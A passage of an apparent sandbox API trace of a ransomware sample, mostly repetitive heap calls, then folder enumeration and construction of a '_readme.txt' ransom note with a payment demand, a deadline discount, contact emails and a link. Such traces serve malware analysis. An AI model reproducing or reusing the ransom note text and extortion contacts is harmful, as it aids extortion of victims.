Size=0x820) returned 0x3b19640 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.734] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.734] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.735] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.735] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.736] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.736] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x840) returned 0x3b19640 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.737] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.737] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19640 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0xc46) returned 0x3b40090 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19640 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b40090 | out: hHeap=0xcd0000) returned 1 [0165.738] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c3b8 | out: hHeap=0xcd0000) returned 1 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x860) returned 0x3b40090 [0165.738] PathFindFileNameW (pszPath="C:\\Boot\\ru-RU\\") returned="ru-RU\\" [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.738] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0165.738] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0165.738] PathFindFileNameW (pszPath="") returned="" [0165.738] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c390 [0165.738] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x759d0000 [0165.739] GetProcAddress (hModule=0x759d0000, lpProcName="SHGetFolderPathW") returned 0x75a55708 [0165.739] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x800) returned 0x3b40090 [0165.739] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b40090 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0165.739] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x810) returned 0x3b19640 [0165.739] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c3b8 [0165.739] FreeLibrary (hLibModule=0x759d0000) returned 1 [0165.739] PathAppendW (in: pszPath="C:\\Boot\\ru-RU\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 1 [0165.739] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.739] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.739] PathFileExistsW (pszPath="C:\\Boot\\ru-RU\\_readme.txt") returned 0 [0165.741] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x7d00) returned 0x3b44e70 [0165.741] lstrcpyW (in: lpString1=0x3b44e70, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde" [0165.741] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde", lpString2="0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like pictures, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-7596obcC8h\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@mail.ch\r\n\r\nReserve e-mail address to contact us:\r\nrestoremanager@airmail.cc\r\n\r\nYour personal ID:\r\n0255Wdasde0GA6QOipVvtKwEznPd4jvrNgsaRYxWIHpcb9x2BW" [0165.742] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b1a750 [0165.742] CreateFileW (lpFileName="C:\\Boot\\ru-RU\\_readme.txt" (normalized: "c:\\boot\\ru-ru\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0165.742] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b1a750 | out: hHeap=0xcd0000) returned 1 [0165.742] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b44e70 | out: hHeap=0xcd0000) returned 1 [0165.742] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19640 | out: hHeap=0xcd0000) returned 1 [0165.742] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.742] FindFirstFileW (in: lpFileName="C:\\Boot\\ru-RU\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0165.742] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.742] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0165.742] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0165.742] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16050, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0165.742] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0165.742] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.742] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c200 | out: hHeap=0xcd0000) returned 1 [0165.742] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c200 [0165.742] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x820) returned 0x3b19ec8 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c368 | out: hHeap=0xcd0000) returned 1 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x20) returned 0x3b3c368 [0165.743] RtlAllocateHeap (HeapHandle=0xcd0000, Flags=0x0, Size=0x830) returned 0x3b19ec8 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b19ec8 | out: hHeap=0xcd0000) returned 1 [0165.743] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, 